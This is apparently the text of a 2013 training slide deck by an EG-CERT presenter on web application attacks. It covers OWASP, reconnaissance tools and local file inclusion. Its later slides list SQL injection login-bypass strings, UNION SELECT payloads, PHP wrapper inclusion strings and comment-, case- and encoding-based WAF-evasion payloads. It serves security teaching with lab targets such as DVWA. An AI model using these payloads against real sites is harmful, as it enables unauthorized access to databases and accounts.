Web Application Attacks And WAF Evasion

Ahmed ALaa (EG-CERT) 19 March 2013

What Are We Going To Talk About?

- introduction to web attacks - OWASP organization - OWASP frameworks - Crawling & info. gathering - Vulnerability Assesment - WAF Evading

Introduction To Web Application Attacks

Server Side Attacks

OWASP The Open Web Application Security Project

OWASP Oraganization

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.

OWASP Frameworks

it’s a vulnerable open source framework for testing vulnerabilites and educational purpose with many level of security to be test .

- DVWA (Damn Vulnerable Web Application)

- Mutillidae - Web Goat

OWASP Top 10 Web App. Vuln. 2013

1. Injection 2. Broken Authentication and Session Management 3. Cross Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Expouse 7. Missing Function Level Access Control 8. Cross Site Request Forgery (CSRF) 9. Using Known Vulnerable Components 10. Unvalidated Redirects and Forwards

Web Attacks Methods

Info Gathering Via Firefox Addons

Wappalyzer: a browser extension that uncovers the technologies used on

websites. It detects content management systems, web shops, web servers, JavaScript frameworks, analytics tools and many more.

Domain Details : Displays Server Type, Headers, IP Address, Location Flag,

and links to Whois Reports. Shows links to check server status and cache when page fails to load.

Web Crawling By Burpsuite

Directory Enumeration By DirBuster

Brute Forcing Basic Authentication & Forms Via Firefox Addon Firefoce

Local File Inclusion (DVWA)

PHP Wrappers

A wrapper is additional code which tells the stream how to handle specific protocols/encodings. For example, the http wrapper knows how to translate a URL into an HTTP/1.0 request for a file on a remote server. There are many wrappers built into PHP by default Php://filter/convert.base64-encode/resource=include.php Data://text/plain;base64,SSBsb3ZlIFBIUAo= Php://input

SQL Injection Attacks

A poorly validated input field in a Web input form may allow an attacker to insert additional SQL instructions which may then be passed directly into the backend database. Attacker sends simple text-based attacks that exploit the syntax of The target interpreter.

SQL Injection Authintication Bypass

SQL Injection Authintication Bypass

Due to no input validation in the code then we can inject our query to gain admin authentication. admin’ -- - admin’ and 1=1 -- - admin’ or ‘1’=‘1 admin’ or 1=1 Limit 0,1 # ‘ or 1=1 -- - ‘ or 1=1 Limit 0,1 /* ‘ AND 1=0 UNION ALL SELECT 1,2,3 -- -

SQL Injection Types

- Union Based injection - Blind Based injection - Time Based injection - Error Based injection - Blind Time Based injection

Detecting SQL Injection Vulnerability

MySQL Error Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12 Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

MSSQL Error Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘;’.

SQL Injection Exploitation (prepare your lab)

- Order By Clause - Union Statement - user() , DataBase() , Version() - Information_schema - Data Base Structure - Substring & ascii

WAF Evasion (Web Application Firewall) Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload.

However, there are various methods for sneaking malicious requests that violate these rules past WAFs by modifying certain parts of their headers or the paths of requested URLs. These are known as protocol-level evasion techniques, and WAFs are not properly equipped to deal with them at the moment because the techniques are not very well documented.

WAF Evasion (Web Application Firewall)

- Detect WAF systems. - Fingerprint WAF systems. - Generic evasion techniques.

WAF Evasion Techniques

● SQL comments in parameters to try to defeat some SQL Injection rules. ● Words in random case to try to defeat some SQL Injection rules. ● SQL query encoding (for example: hex encoding via database features). ● URI encoding (for example: Unicode forward slash).

WAF Evasion Techniques (SQL inj.)

Comment: /*!*/ /*!order*//**//*!by*/ 1— /*!union*//**//*!select*/ 1,2,3,4,5— Case sensitive /*!oRdEr*//**//*!bY*/ 1— /*!uNiOn*//**//*!sEleCt*/ 1,2,3,4,5— Encoding %2F*!uNiOn*%2F%2F**%2F%2F*!sEleCt*%2F%201%2C2%E2%80 table_name=0xHEX to bypass forbidden single quote ‘

Questions ??!!!

Thank you

Contact: En_3Laa@live.com